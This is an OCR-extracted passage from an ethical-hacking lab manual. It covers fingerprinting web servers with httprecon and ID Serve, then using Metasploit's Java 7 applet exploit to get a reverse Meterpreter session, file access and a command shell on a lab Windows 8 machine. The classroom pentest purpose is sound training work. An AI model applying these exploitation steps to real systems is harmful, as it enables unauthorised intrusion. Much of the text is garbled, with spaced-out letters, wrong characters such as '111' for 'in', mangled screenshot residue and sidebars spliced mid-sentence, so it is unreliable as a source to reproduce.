Professional Documents
Culture Documents
~ Lab Scenario
[Z7 Valuable
information
S
Test your
knowledge
Web exercise
Workbook review
Lab Objectives
T h e o b jectiv e o f tins lab is to h elp stu d e n ts learn to d e te c t u n p a tc h e d secu rity
flaw s, v e rb o se e rro r m essag es, a n d m u c h m o re.
T h e o b jectiv e o f this lab is to:
C E H L ab M an u al Page 731
F o o tp rin t w e b servers
C rack re m o te p a ssw o rd s
Lab Environment
T o earn o u t tins, you need:
& Tools
dem onstrated in
this lab are
available in
D:\CEHTools\CEHv8
Module 12
Hacking
W ebservers
Lab Duration
Tim e: 40 M inutes
T A S K
Overview
C E H L ab M an u al Page 732
Lab Tasks
R ecom m ended labs to dem o n strate w eb server hacknig:
Lab Analysis
A nalyze an d d o cu m en t the results related to die lab exercise. G ive your o p in io n 011
your targets security p ostu re an d exposure.
C E H L ab M an u al Page 733
KEY
/ Valuable
mtormadon
Test your
**
W e b exercise
W o rk b o o k re\
Lab Scenario
W e b ap p licatio n s are th e m o s t im p o rta n t w ays to r an o rg an iz atio n to p u b lish
in fo rm a tio n , in te ra c t w ith In te rn e t u se rs, a n d estab lish an e - c o m m e rc e /e g o v e rn m e n t p rese n ce .
H o w e v e r, if an o rg an iz atio n is n o t rig o ro u s in
co n fig u rin g a n d o p e ra tin g its p u b lic w eb site, it m ay be v u ln e ra b le to a v ariety o f
security threats. A lth o u g h th e th rea ts 111 cy b ersp ace re m a in largely th e sam e as
111 th e physical w o rld (e.g., frau d , th e ft, v an d alism , a n d te rro rism ), th e y are far
m o re d a n g e ro u s as a result. O rg a n iz a tio n s can face m o n e ta ry lo sses, d am ag e to
re p u ta tio n , 01 legal ac tio n if an in tru d e r successfully v io lates th e co n fid en tiality
o f th e ir data. D o S attack s are easy fo r attack ers to a tte m p t b ecau se o f th e
n u m b e r o t p o ssib le attac k v e c to rs, th e v arie ty o f a u to m a te d to o ls available, an d
th e lo w skill level n e e d e d to use th e to o ls. D o S attack s, as w ell as th re a ts o f
in itiatin g D o S attacks, are also in creasin g ly b e in g u se d to blackm ail
o rg an iz atio n s. 111 o rd e r to be an e x p e rt eth ical h ac k er a n d p e n e tra tio n tester,
}o il m u s t u n d e rs ta n d h o w to p e rfo rm fo o tp rin tin g 011 w e b servers.
Lab Objectives
T h e o b jectiv e o f this lab is to h elp sm d e n ts le arn to fo o tp rin t w eb se rv e rs. I t will
te ac h y o u h o w to:
H Tools
dem onstrated in
this lab are
available D:\CEHTools\CEHv8
Module 12
Hacking
W ebservers
C E H L ab M an u al Page 734
U se th e h ttp r e c o n to o l
G e t Webserver fo o tp rin t
Lab Environment
T o carry o u t th e lab, y o u need:
I f y o u d ecid e to d o w n lo a d th e la te st version, th e n sc re e n sh o ts sh o w n
111 th e lab m ig h t d iffer
m H ttprecon is an
open-source application
that can fingerprint an
application o f webservers.
A w e b b ro w se r w ith I n te r n e t access
Lab Duration
T im e: 10 M inutes
Overview of httprecon
h ttp re c o n is a tool for advanced w eb server fingerprinting, similar to httprint. T h e
h ttp re c o n p roject does research 111 th e held o f w eb server fingerprinting, also
k n o w n as http fingerprinting. T h e goal is lughlv accurate identification o f given
httpd im plem entations.
TASK
Footprinting a
Webserver
Lab Tasks
1.
2.
3.
httprecon 7.3
File
Configuration
Fingergrinting
Reporting
I 1
Help
Target
|http;//
|80
T ]
6 "*
GET existing | GET long request | GET nonexistag | GET wrong protocol | HEAD existing | OPTIONS com * I *
G1 Httprecon is distributed
as a ZIP file containing the
binary and fingerprint
databases.
j Hits
1 Match % 1
C E H L ab M anual P ag e 735
4.
5.
6.
Configuration
Fingerprinting
Reporting
Help
I http://
1 |juggyboy ccxn|
GET existing | GET long request | GET non existing | GET wrong protocol | HEAD existing | OPTIONS com * I * I
HTTP/1.1 200 OK
bate: Thu, 18 Oct 2012 11:36:10 GMT
bontent-Length: 84S1
Content-Type: text/html
Content-Location: http://uggyboy.com/index.html
Last-Modified: Tue, 02 Oct 2012 11:32:12 GMT
Accept-Ranges: non
ETag: "a47ee9091a0cdl:7a49"
Server: Microsoft-IIS/6.0
K-Powered-By: ASP.NET
22
Apache 1.3.37
I Hits
| Match % |
88
71
S3
100
80.68...
71. 59
63
63
62
71 59 .
71.59
70.45. .
62
60
70.45...
6818
7.
Click die GET long request tab, w h ich will list d o w n die G E T request.
T h e n click die Fingerprint Details.
httprecon 7.3 - http://juggyboy.com:80/
File
Configuration
Fingerprinting
Reporting
1- l LJ |
Help
juggyboy com|
[* -
GET existing | GET long request ] GET non existing | GET wrong protocol | HEAD existing | OPTIONS com * I * I
HTTP/1.1 400 Bad Request
Content-Type: text/html
Data: Thu, 18 Oct 2012 11:35:20 GMT
Connection: close
Content-Length: 34
i~~
H ttprecon does not
rely on simple banner
announcements by the
analyzed software.
P r o t o c o l V e r s io n
S ta tu sc o d e
S ta tu sta x t
B anner
K -P o v e r e d -B y
H eader S p aces
C a p i t a l a f t e r D a sh
H e a d e r-O r d e r F u l l
H e a d e r -O r d e r L im it
1
1
C o n t e n t -T y p e ,D a t e ,C o n n e c t io n ,C o n t e n t- L e n g t h
C o n t e n t -T y p e ,D a t e ,C o n n e c t io n ,C o n t e n t- L e n g t h
Ready
FIGURE 1.3: The fingerprint and G E T long request result o f the entered website
Lab Analysis
A nalyze an d d o cu m en t die results related to the lab exercise. G ive your o p in io n 011
your targets secuntv p ostu re an d exposure.
T o o l/U tility
h ttp r e c o n T o o l
C o n te n t-ty p e : te x t/h tm l
c o n te n t-lo c a tio n :
h tt p : / / ju g g v b o v .c o m / 1n d e x .h tm l
E T ag : "a 4 7 ee 9 0 9 1eOcd 1:7a49"
server: M ic ro s o ft-IIS /6 .0
X -P o w ered -B v : A S P .N E T
Questions
1.
2.
0 Y es
No
P la tf o r m S u p p o r te d
0 C la s s r o o m
C E H L ab M an u al Page 737
!Labs
Lab
KEY
/ Valuable
information
Test your
** Web exercise
m
Workbook re\
Lab Scenario
111 th e p rev io u s lab y o u h av e le arn ed to u se th e h ttp r e c o n tool, h ttp r e c o n is a
Lab Objectives
T h is lab w ill sh o w y o u h o w to f o o tp rin t w eb serv ers a n d h o w to u se ID Serve.
It w ill te ac h v o u h o w to:
H Tools
dem onstrated in
this lab are
available in
D:\CEHTools\CEHv8
Module 12
Hacking
W ebservers
U se th e ID Serve to o l
G e t a w eb serv er fo o tp rin t
Lab Environment
T o carry o u t th e lab, y o u need:
I f v ou d ecid e to d o w n lo a d th e la te st version, th e n sc re e n sh o ts sh o w n
111 th e lab m ig h t d iffer
C E H L ab M an u al Page 738
A w e b b ro w s e r w ith Internet a c c e s s
Lab Duration
Tim e: 10 M inutes
m ID Serve is a simple,
free, small (26 Kbytes), and
fast general-purpose
Internet server
identification utility.
T A S K
Footprinting a
W ebserver
Overview of ID Serve
ID Serve attem pts to determ ine die domain name associated w idi an IP. Tins
process is kno w n as a reverse DNS lookup an d is h an d y w h e n checking firewall
logs o r receiving an IP address fro m som eone. N o t all IP s th at have a forward
direction lookup (D om ani-to-IP ) have a reverse (IP -to-D om ain) lookup, b u t m any
do.
Lab Tasks
1.
3.
ID Serve
Internet Server Identification Utility, v l .02
Personal Security Freeware by Steve Gibson
ID Serve
Background
Seiver Query
Q & A /H elp
Enter or copy I paste an Internet server URL a IP address here (example: www.microsoft.com):
Copy
4.
5.
6.
7.
ID Serve
ID Serve
Background
P e rs o n a l S e c u rity F re e w a re b y S te v e G ib s o n
Copyright (c) 2003 by Gibson Research Corp.
etver Query
Q & A /H elp
Enter or copy / paste an Internet server URL or IP address here (example: www miciosoft.com):
C1
Ih ttp / / I 0 .0 0 .2 /re a lh o m e |
r2 [
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 07 Aug 2012 06:05:46 GMT
Accept-Ranges: bytes
ETaq: "c95dc4af6274cd1:0"________________
Copy
Lab Analysis
D o c u m e n t all die server inform ation.
H T T P / 1.1 200 o k
c o n te n t-T y p e : te x t/h tm l
Questions
1. Analyze how ID Se1ve determines a sites web server.
2. What happens if we enter an IP address instead of a URL
Internet Connection Required
Yes
0 No
Platform Supported
0 Classroom
C E H L ab M an u al Page 741
0 !Labs
3
Exploiting Java Vulnerability Using
Metasploit Framework
Metasploit sofinare helps security and ITprofessionals identify security issues, verify
vulnerability Mitigations, and manage expert-driven security assessments.
ICON
KEY
__ Valuable
inform ation
T est your
knowledge
W eb exercise
m
W orkbook review
J T Tools
dem onstrated in
this lab are
available in
D:\CEHTools\CEHv8
Module 12
Hacking
Webservers
C E H L ab M an u al Page 742
Lab Scenario
Penetration testing is a method of evaluating the security ol a computer system 01
network by simulating an attack from malicious outsiders (who do not have an
authorized means of accessing the organization's systems) and malicious insiders
(who have some level of authorized access). The process involves an active analysis
of the system for any potential vulnerabilities that could result from poor or
improper system configuration, either known and unknown hardware 01 software
flaws, 01 operational weaknesses 111 process or technical countermeasures. Tins
analysis is earned out from the position of a potential attacker and can involve active
exploitation of security vulnerabilities. The Metasploit Project is a computer secuntv
project that provides information about security vulnerabilities and aids 111
penetration testing and IDS signamre development. Its most well-known subproject is the open-source Metasploit Framework, a tool for developing and
executing exploit code against a remote target machine. Other important subprojects include die Opcode Database, shellcode arcluve, and security research.
Metasploit Framework is one of the main tools for every penetration test
engagement. To be an expert etliical hacker and penetration tester, you must have
sound understanding of ]Metasploit Framework, its various modules, exploits,
payloads, and commands 111 order to perform a pen test of a target.
Lab Objectives
The objective of tins lab is to demonstrate exploitation ot JDK
take control ot a target machine.
vulnerabilities to
Lab Environment
111 this lab, you need:
You can also download the latest version ot Metasploit Framework from
die link http://www.111etasplo1t.com/download/
It you decide to download the latest version, then screenshots shown 111
the lab might ditter
A computer running Windows Server 2012 as host macliine
Windows 8 running on virtual macliine as target macliine
A web browser and Microsoft .NET Framework 2.0 or later in both host
and target macliine
j RE. 7116 miming on the target macliine (remove any other version of jRE
installed 111 die target 111acl1111e).T11e |R E 7116 setup file (jre-7u6-wi11dows1586.exe) is available at D:\CEH-Tools\CEHv8 Module 12 Hacking
Webservers\Webserver Attack Tools\Metasploit
You can also download the The IRE 7116 setup tile at
http://www.oracle.com/technetwork/iava/javase/downloads/ire7downloads-163~5S8.html
Double-click m etasploit-latest-windows-installer.exe and follow the
wizard-driven installation steps to install Metasploit Framework
Time: 20 Minutes
* t a s k
Installing
Metasploit
Framework
C E H L ab M an u al Page 743
J! U*rudJ ConnerHon
1- -I**
I*
rt ,.ips; loct>ost. 90
5 w
Normally, *henyou tryto connect securely, sites 1:, presenttrusted identification tc prove that you
are going to the nght place. Ho>ever. this site's der&tycan t be verrfsed.
What Should 1 Do?
Ifyou usuallyconnect to this site without problem^flvs t0ec>d mun that someone is trying to
impersonate the site, andyou shouldn't continue.
[ Gel me oulofhete!
Technical Details
|
Normally, wihrnyou tty to eonnert tee urrty titei wMpnwK truftrd Sentil*Men re prove that you
art going to the light plac. I lw r t, tlm t!t 1 itfrMj U
l
What Should I Do?
If you usually conned to this git wrthoi/t pobk-ns, th-, moi toJimun that someone n trying to
irrtpertonate the ate, andyou shouldn't eenrmite.
| Gelmeoulotheiel
Technical Details
I Understand the Risks
I Add Excepaoi
5. 111 the Add Security Exception wizard, click Confirm Security Exception.
1*I
Legitimate banks, stores, and o ther public sites will not ask you to do this.
Server
Location: I liRMMHBMMfeMI
With sun.awt.SunToolkit,
we can actually invoke
getFieldQ by abusing
findMethod() in
StatementiavokeIntemal0
(but getFieldO must be
public, and that's not
always die case in JDK 6)
in order to access
Statement.acc's private
field, modify
AccessControlContext, and
then disable Security
Manager.
Certificate Status
This site attempts to identify itself with invalid information.
Wrong Site
Certificate belongs to a different site, which could indicate an identity theft.
Unknown Identity
Certificate is not trusted, because it hasn't been verified by a recognized authority
using a secure signature.
Cancel
6. On die Metasploit Setup and Configuration Login screen, enter text 111 die
Username. Password, and Password confirmation fields and click Create
Account.
k-
M Vti .
(Jlmetasploit
Password confirma
ijaiKMtmn
I SMrM 00) UTC~
| Q Cioatt Auwni
Enter your valid email address 111 the Metasploit Community option and
click GO.
F !
Product
mve^V.e
(J)metasploit
G
Dmetasploit
~ community
Mct.1r.p10HCommunityEdMiontimplifiot
rfACfKd1<cvr no vulnerability
vmifkaaon far specific eiplolta lncreaing
Ihe tcBvono68 ofvulnerabilityscanners
ucnasN*o*erortre
Snan wpKMUbsn
Password ijd*r;
We0 appitcafcixi scam-
Sooal engmerw3
Teamcoa&oa*on
Reporting
Entetpnse-lewl suppon
OR
FREE EDITION
J NaMwt discoveiy
J vulnerabilityscann9rImport
S Basicexpioitallon
/ Module tyovwer
Lnteremail address:
___________ <ggmail.com||| Go 1
9. Now log in to your email address and copy die license key as shown 111 die
following figure.
To be successfully
exploited, an unsuspecting
user running an affected
release in a browser will
need to visit a malicious
web page that leverages tins
vulnerability. Successful
exploits can impact the
availability, integrity, and
confidentiality of the user's
system.
r Rap1d7
Thank you for choosing Rapid7 Metasploit Community Edition Metasploit Community Edition
simplifies network discovery and vulnerability verification for specific exploits, increasing the
effectiveness of vulnerability scanners such as Nexpose - for free
Your license is valid for one year and expires on 11/15/2013 When your license runs out, you can
simply apply for a new license using the same registration mechanism.______________________
t__1
fc
a!>01t-trial-i<ey,i^?pr0durt=a1murnPhURl=hrtp1%3A%2F%2fIocalhoTL3AT?9(WL2Fset1jp3Li>rtval<:-A\*e*wt;
.1 ,1
p * c-
(J) metasploit
4 More Steps To Get Started
1. Copy the Product Key from the email we just sent you.
I. , n r ,
f
C I (?I.
(J)metasploit'
Hie Metasploit Framework
will always be free and
open source. The
Metasploit Project and
Rapid7 are fully committed
to supporting and growing
die Metasploit Framework
as well as providing
advanced solutions for
users who need an
alternative to developing
dieir own penetration
testing tools. It's a promise.
33
3 0ra*ta commgn^tfaiorWlicenseproductkt/.oucansupthisslep
|WNtW-J6tU-X3TW-RN6a
D Us an HTTPPrat*to react! V* tomet?
A hips/ lot*t>ost. 90
' ' 7C )
fi #
C ~I
, m i 11 i^ ic j o p iw i 1
I
community
1 Home
Protect*
Activation Successful
|^
1
^ oe to !*fen
, ****
Search
1 / Pr04ct Mr**
Abating Window* Kemot Management (WinUM) with Metasploit
thow 10 v.imtoe
I
(tolaur
STvowmg1 to 1of 1ratrws
II
y1em
?0mjhM90
PcevkMt 1 *!I
last
T A S K
Updating
Metasploit
e -
Home
PH
AdinlnInti11lion v ^
GJ community1
metasploit
| software upaates
somvare ucense
Project*
14. Click Check for Updates, and after checking die updates, click Install.
By default, Metasploitable's
network interfaces are
bound to die NAT and
Host-only network
adapters, and die image
should never be exposed to
a hostile network. (Note: A
video tutorial on installing
Metasploitable 2 is available
at die link Tutorial on
installing Metasploitable 2.0
on a Virtual Box Host Only
network)
15. After completing the updates it will ask you to restart, so click Restart.
1Af
1loc*txt - SO*^lspKCV
-| - Geogl,
fi\ ft
c -
17. After completion of restart it will redirect to Metasploit - Home. Now click
Create New Project from die Project drop-down list.
Creating a New
Metasploit Project
*MeUspKxt - Pfojerts
..-TP
metasploit
community
:m t NewPrcici
y Hide NttvvaPmw(
1 St'ov* HI P10jcts
ac to *offn
J M o
*hW tO V MillMl
Q Mine
u
<Mut
*howto* 110 1of
Q m n iic t
j Search
4 product Mews
Actrvc sessions
:
tasks
0
owner
1 system
Members
0
Upared
w oesenpooft
beut1how ago
I,I Kirvm. I art L..I
18. 111 Project Settings, provide the Project Name and enter a Description,
leave the Network Range set to its default, and click Create Project.
I. ,nr,
n
^
A ,.Ip. localhoit- V. a .
SB
(]metasploit
community1
Hie Metasploit Framework
is a penetration testing
system
and development platform
diat you can use to create
security tools and exploits.
The
Metasploit Framework is
written in Ruby and
includes components in C
and assembler.
The Metasploit Framework
consists of tools, libraries,
modules, and user
interfaces. Tlie
basic function of die
Metasploit Framework is a
module launcher diat
allows die user to
configure an exploit
module and launch the
exploit against a target
svstem.
Protect name*
Description
3&OT
a Exploit |
The exploit takes advantage of tiro issues in JDK 7 The OassFinOer and
MethodFinder nndMernod() Botr! were newly introduced in JOK 7 dassFinder is a
replacement for t tassF.orNarne back in JQg 6 R aicnrs untnisted code to obtain a
reference and nave access to a restricted o a :o ? e r JOK 7. *men can oe used to aDuse
sun a^-SuoJoolKit (a restricted package) VMh n ^SunTOoiwt we can actually invoke
Network range
*? R A P ID 7
A hfclps/ lott>ost. SC
? C | ? Google
1
(U community
metasploit
I
| Overview
1 Horn
g* Analysis
Java Lxptoit
fi
rt community
j> Help
C ~1
^
I
_ Sessions
1 Campaigns
* Wt*b Apps
|& Modules |
lags
Q) Reports
JZ 11
*1*
0itw n r
Penetration
0 110413dlKovnrd
0 service* delected
0vumereDMMt
^ Scan-
> f 1nrt_ j * f c y a - ,
Evidence Collection
I
ln n k ! opeatd
0 pHtimilt cracked
0 SMBhasries stoiee
0 SSMkeys slofca
Ujtrto>cc
"
Q fiplal
Cleanup
0 closed sasswas
iai cofcet...
1
Recent Events
------------------------------------------------------------------------------------------------------------
T A S K
Running the
Exploit
C E H L ab M an u al Page 751
'
F I
,'MrtMf** Modu
^
*!I C009l
H V
(]metasploit
community1
ft Overview
Analysis
Sessions
,}Campaigns
* Web Apps
Search Modules
i> Modules
Tags
r , Reports
~ Tasks
2012-4681
Module Statistics show Search Keywords show
OS
ra
ra
Dtadcame Out
Z-***rZS. Z3\2
cxmtr 18. 12
* A
1
1
0aaWtiw2012
*M i
C;teha S.2012
Server ExpM
SarveffxpM
OcMarL20i2
3.2012
S w fc 25.2012
a**ar*af ' iH Q
UOt
S* Use*
* w
S*v L>1W
Ctnt UpW
e**rfp*
m
tm
Module Rankloo
0SVDS
0672
86563
56136
EDS
ZZI61
220
229*4
?IMS
14.2012
KMT
2012 *m
mm
MfiU
< <<*
.?.* R A P ID 7
(]metasploit
Y community
ft Overview
>1
(1
n Analysis
! ~ Sessions
,/ Campaigns
Search Modules
# Web Apps
*y Modules
Tags
^ Hcpoiu
S tid
^ Tasks
?0 1? 4081
Module Statistics show Searrh trywrrds si
Module Type
BID
CltfUExOtt!
OSVDB
IX
B4B6T
a 7AodKR*n>UCoil*bucutbn
'.'R A P ID 7
FIGURE 3.19: Metasploit Java 7 Applet Remote Code Execution Exploit found
111 Payload Options set die Connection Type as Reverse and 111
Listener Host ,enter die IP address where Metasploit is running.
b. 111 Module Options, enter die SRV Host IP address where Metasploit is
running.
c. Enter die URI Path (in diis lab we are using greetings) and click Run
Module.
C E H L ab M an u al Page 752
mmrnm
^
2A*i~ k
James forsnaw
I
|duck<Jduckgrnetasp*ocim
(?I.
T
o /t
SoJa
iuan .aiquei
uan.va:q1ie2em&ta5p)<:M:cr
j
rjetll
The module is designed to run in the bacKground. exploitingdiem ss16- 1s 3s iney corned Inw case 01eCbrowser exploits,
:?as setne UR1PATHocoon Delow ityouwantio control which URLis usefllo nost>6 sjf.oz Ts srvport coor can &e used
cf!an<;e me I3tenng por inme case ot passve utility modules (autcary) me moaneoaput se *31ae !tornme Tasiclog alter
vw moiSute has ten started
Target Seffiags
IGeneric (Java Payload) v|
siybtaiVp
Meterpreter
v|
LttenwPwH |1aW-6S3S
Tlibcalport101tanon. (po>t)
N$Mate 351.1#r nfiynrj eonnectan* (Met)
Pthto * customSSLc*tlffcl i0jt It fnde
Seec<VIhe mwon 0<SSLthat hogid t um4
ThURIlouh 10 ttuxptot
* 1m M
1o
-, I
(1
(]metasploit
community
In Metasploit Pro, you can
define IPv6 addresses for
target hosts. For example,
when you
perform a discovery scan,
scan a web application,
execute a bruteforce attack,
or run a
module, you can define an
IPv 6 address for die target
hosts. For modules,
Metasploit Pro
provides several payloads
diat provide IPv6 support
for Windows x86, Linux
x86, BSD x86,
PHP, and cmd.
% Overview
M Analysis
mUpton
Inti
[ Stwioni
,/Campaigns
0 Web Apps
V Modules
lags
3 Reports
Tasks Q
lath
24. Now switch to Windows 8 Virtual Maclune, launch die Chrome browser
and enter http:// 10.0.0.10:8080/greetings in die address bar and press
Enter.
25. Click die Run this tim e for Java(TM) w as blocked b ecau se it is out of
date prompt 111 die Chrome browser.
C E H L ab M an u al Page 753
File
Action
Medi
Clf)t)0<*d
j O c G ll l
- *
if
View
is
"
Hdp
10Q0.10t8080/greetings/
Update plug-in...
26. Now switch to your Windows Server 2012 host machine and check die
Metasploit task pane. Metasploit will start capturing die reverse connecdon
from die target macliine.
^
A hti|>K//'loC*icti79Qp'1*oi3pccvtW
^7 C 11Google
GDcommunity1
metasploit'
b Overview
Analysis
. Sessions
Campaigns
* Web Apps
Modules
lags
_J Reports
Tasks Q
Project Management
A Metasploit Pro project
contains die penetration test
diat you want to run. A
project defines
die target systems, network
boundaries, modules, and
web campaigns diat you
want to
include in die penetration
test. Additionally, within a
project, you can use
discovery scan to
identify target systems and
bruteforce to gain access to
systems.
FIGURE 3.23: Metasploit Capturing die reverse connection of targeted macliine
27. Click die S essio n s tab to view die captured connecdon of die target
macliine.
User Management
Administrators can assign
user roles to manage the
level of access that the user
has to
projects and administrative
tasks. You can manage user
accounts from die
Administration
menu.
28. Click die captured session to view die information of a target machine as
shown 111 die following screenshot.
- a x
1 r,
1 Google
____ p {
GDcommunity
metasploit
(>v<*1viLw
Horn
M Analysis I ~ Sessions Q
Java Ixptvt
ttCoM
^ Cuiiipulgns
V Modules
lags
Repoits
CZ fasks Q
ttiin n i
(J CMafwp
Active Sessions
| * S cmcm
OS
Moat
J #012 100
-wndewad
Typv
Melerpffier
Agw
4m m
Dvet1U011
** v! 0 v*mse
Attack Modulo
+ JAVA_JHE17JLXEC
Closed Sessions
Global Settings
Global settings define
settings that all projects use.
You can access global
settings from the
Administration menu.
From the global settings,
you can set die payload type
for die modules and enable
access to
die diagnostic console
through a web browser.
Additionally, from global
settings, you can create API
keys, post-exploitation
macros,
persistent listeners, and
Nexpose Consoles.
-' R A P ID 7
System Management
As an administrator, you can
update the license key and
perform software updates.
You can
access die system
management tools from the
Administration menu.
-Sesac1
c
(u)
metasploit
^ Y
r community
\ Overview
^ A n ily ib
>1
(1
I ~ Stw toM Q
',/Campaigns
Wob Apps
V I
Session 1 on 10.0.0.12
&
a
k
>
n
T
y
i
n
i
41
*
'n
a
t
a
i
p
i <
p
j 1*
'
O
Infoi mallon
* 1 O
A
t
t
a
c
k
M
o
d
u
l
o.
io
Ipv
Available Actions
( Collect System
. CoeeasrstHr
0 2010-2012 R3Pd7me Be
VR APID 7
31. You can view and modify die files from die target macliine.
fik
1M01?
'
If a bruteforce is successful,
Metasploit Pro opens a
session on die target system.
You can
take control of die session
dirough a command shell or
Meterpreter session. If there
is an
open session, you can collect
system data, access die
remote file system, pivot
attacks and
traffic, and run postexploitation modules.
C E H L ab M an u al Page 757
Sal SpMCti
SyW0W5
U System
L Sy8tem32
L* X4P1
L &ls
t* Ten
oasCala
Li V
L_
GmWmSlot*
AtaS*S
{ *Ins
sstch
>
n-ys
Li, ChMNM
_ cutty
_fr-aong
Qllwax.fi
90C70912K23IC lyt
OKMalalb*
MMpfW exe
PfROb*
PrefMvrnal *1
carter
1720
&&24a
14a6
718
j-iseb
2012-05-19093340UTC
2012-11-15135852ITTC
201205-18093341 UTC
2012-11-15135652UTC
201205-1909413 UTC
20120918 09272\ -TC
2012-11-1514.13.50UTC
2012-05-190ft 37 UTC
2012-05-19Oft40 UTC
2012-05-19Oft33.<1UTC
2012-0912 113529UTC
2012-11-1514ftS 17UTC
2012-05-19Oft33*5 UTC
2012-05-190*3051UTC
2012-10 09070351 UTC
20120ft 10005650UTC
2012-05-19Oft3340UTC
201205-190ft0927UTC
2012-05-19Oft3341UTC
2012 05-190911 54UTC
2012 05^19Oft0920UTC
201245.19093341UTC
7012415.190 3351UTC
2012.104411 14JUTC
2012-09.12Hfil2UTC
:012-04.190* 1,uic 1
?OOW1r.M23S*aSUTC
M12-10-1S0SMMUTC
1 ?012-05-1821 46 7UTC
!G009I.
ft
i
32. You can also launch a command shell of die target machine by clicking
Command Shell from sessions capUired.
33. To view die system IP address and odier information dirough die
command shell 111Metasploit, type ipconfig Iall and press Enter.
Manual exploitation
provides granular control
over die exploits diat you
ran against die target
systems. You run one
exploit at a time, and you
can choose die modules and
evasion options
diat you want to use.
34. The following screenshot shows die IP address and odier details of your
target macliine.
!< a Ip*.
U**
F !
l -n
km
: U13 Hierosorc Karrwti
Hardware KM00:00:00:00:04:00 :
MTU
: 24?2
network Art.iptor
Interface 13
Naw>
Meterpretcr >|
C E H L ab M an u al Page 758
35. Click die Go back one page button in Metasploit browser to exit die
command shell.
A report provides
comprehensive results from
a penetration test. Metasploit
Pro provides
several types of standard
reports diat range from high
level, general overviews to
detailed
report findings. You can
generate a report in PDF,
Word, XML, and HTML.
37. It will display Session Killed. Now from die Account drop-down list, select
Logout.
I*
7'8,
J J j A Account Jason
metasploit
r community1
fc Overview
rt Analysis
~ Sessions
Campaigns
Web Apps
Modules
lags
I Reports
j User Settings
T- J Logout
Session killed
Active Sessions
Closed Sessions
Attack Module
E5CMW11
&
1t012-Wn<tow6
wcterpretef
l12-tMS14 0eUTC
Atfnil 0 1Vn<lowp
JAVA^HEU_EWC
uMtamiaiH
FIGURE 3.34: Metasploit Session Killed and Logging out
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion 011
your targets secunty posture and exposure.
P L E A S E TALK T O Y O U R I N S T R U C T O R IF YOU
R E L A T E D T O T H I S LAB.
T ool/U tility
HAVE
QUESTIONS
Metasploit
Framework
Question
1. How would you create an initial user account from a remote system?
2. Describe one or more vulnerabilities that Metasploit can exploit.
Internet Connection Required
Yes
0 No
Platform Supported
0 Classroom
C E H L ab M an u al Page 760
0 !Labs